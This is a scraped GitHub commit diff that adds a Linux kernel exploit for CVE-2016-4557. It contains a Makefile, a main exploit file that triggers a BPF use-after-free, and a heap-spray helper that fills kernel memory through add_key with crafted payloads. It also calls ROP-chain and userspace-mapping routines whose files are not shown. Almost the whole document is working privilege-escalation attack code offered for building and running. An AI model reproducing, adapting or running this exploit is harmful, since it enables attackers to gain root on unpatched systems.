ww9210
diff --git a/‎cve-2016-4557-exp3/Makefile
Lines changed: 2 additions & 0 deletions b/‎cve-2016-4557-exp3/Makefile
Lines changed: 2 additions & 0 deletions
diff --git a/‎cve-2016-4557-exp3/exp3.c
Lines changed: 105 additions & 0 deletions b/‎cve-2016-4557-exp3/exp3.c
Lines changed: 105 additions & 0 deletions
diff --git a/‎cve-2016-4557-exp3/heapspray_addkey.c
Lines changed: 36 additions & 0 deletions b/‎cve-2016-4557-exp3/heapspray_addkey.c
Lines changed: 36 additions & 0 deletions
@@ -0,0 +1,2 @@
+all:
+	gcc -o exp3 exp3.c -Wall -static
@@ -0,0 +1,105 @@
+#define EXPLOIT
+#define _GNU_SOURCE
+#include <errno.h>
+#include <err.h>
+#include <unistd.h>
+#include <fcntl.h>
+#include <sched.h>
+#include <signal.h>
+#include <sys/types.h>
+#include <sys/stat.h>
+#include <sys/syscall.h>
+#include <sys/prctl.h>
+#include <linux/bpf.h>
+#include "log4_e7fbf84e10241ada30c98a0ad975e69838a7066a_log0_0.prog.c"
+#ifdef EXPLOIT
+    #include "heapspray_addkey.c"
+    #include "rop_payload.c"
+    #include "userspace_base_mmap.c"
+#endif
+
+#ifndef __NR_bpf
+# if defined(__i386__)
+#  define __NR_bpf 357
+# elif defined(__x86_64__)
+#  define __NR_bpf 321
+# elif defined(__aarch64__)
+#  define __NR_bpf 280
+# else
+#  error
+# endif
+#endif
+
+int do_nothing(void *p) {
+  prctl(PR_SET_PDEATHSIG, SIGKILL);
+  while (1){
+	  sleep(1);
+  }
+}
+
+int main(void) {
+	char buf[4096];
+
+	char child_stack[8000];
+	int child = clone(do_nothing, child_stack + sizeof(child_stack), CLONE_FILES, NULL);
+	if (child == -1)
+		err(1, "clone");
+
+	int uaf_fd = open("/proc/self/maps", O_RDONLY);
+	if (uaf_fd == -1)
+		err(1, "unable to open UAF fd");
+
+	struct bpf_insn insns[2] = {
+		{
+			.code = BPF_LD | BPF_IMM | BPF_DW,
+			.src_reg = BPF_PSEUDO_MAP_FD,
+			.imm = uaf_fd
+		},
+		{
+		}
+	};
+	union bpf_attr attr = {
+		.prog_type = BPF_PROG_TYPE_SOCKET_FILTER,
+		.insn_cnt = 2,
+		.insns = (__aligned_u64) insns,
+		.license = (__aligned_u64)""
+	};
+	if (syscall(__NR_bpf, BPF_PROG_LOAD, &attr, sizeof(attr)) != -1){
+		errx(1, "expected BPF_PROG_LOAD to fail, but it didn't");
+	}
+	if (errno != EINVAL){
+		err(1, "expected BPF_PROG_LOAD to fail with -EINVAL, got different error");
+	}
+
+	//lseek(uaf_fd, 0, SEEK_SET);
+	sleep(1);
+
+#ifdef EXPLOIT
+    save_state();
+    spray_buffer_init();
+    init_userspace_base();
+    prepare_krop();
+    kmalloc(1024*2); 
+    //usleep(200000);
+    //do_spray=0;
+#endif
+
+    loop(uaf_fd);
+    
+	/*
+	while (1) {
+		sleep(1);
+		// at this point, the struct file of uaf_fd should be freed 
+		ssize_t res = read(uaf_fd, buf, 4096);
+		if (res == -1){
+			err(1, "unable to read from uaf_fd post-UAF");
+		}
+		if (res == 0){
+			errx(1, "unable to read from uaf_fd post-UAF (EOF)");
+		}
+		write(1, buf, res);
+		lseek(uaf_fd, 0, SEEK_SET);
+	}
+	*/
+    pause();
+}
@@ -0,0 +1,36 @@
+#define SPRAY_BUF_SIZE 247
+char spray_buffer[248];
+void spray_buffer_init(){
+    *(unsigned long*)(spray_buffer + 40)=0xfaceac90;
+    *(unsigned long*)(spray_buffer + 56)=0x100000000000001;
+    *(unsigned long*)(spray_buffer + 64)=0x400000000;
+    *(unsigned long*)(spray_buffer + 72)=1;  // mutex
+}
+
+#include <stdio.h>
+volatile int do_spray=1;
+void kmalloc_no_free(int times)
+{
+    int i;
+    int ret;
+    char buf[256];
+    for(i = 0; i < times; i++){
+        //sprintf(buf,"wtf%d",i);
+        //memset(exploitbuf2,0x43+i,255);
+        ret=syscall(__NR_add_key, "user", buf, spray_buffer, SPRAY_BUF_SIZE-0x18, -2);
+        /*sizeof(struct user_key_payload)=18*/
+        printf("%x\n", ret);
+    }
+}
+void kmalloc(int times)
+{
+    int i;
+    int ret;
+        //for(i=0;i<1024;i++)
+    for(i=0;i<times;i++){
+        if(do_spray){
+            //syscall(__NR_add_key, "user", "wtf", exploitbuf, SPRAY_BUF_SIZE, -2);
+            ret=syscall(__NR_add_key, "root", "wtf", spray_buffer, SPRAY_BUF_SIZE, -2);
+        }
+    }
+}
Original file line number	Diff line number	Diff line change
`@@ -0,0 +1,2 @@`
	`1`	`+all:`
	`2`	`+ gcc -o exp3 exp3.c -Wall -static`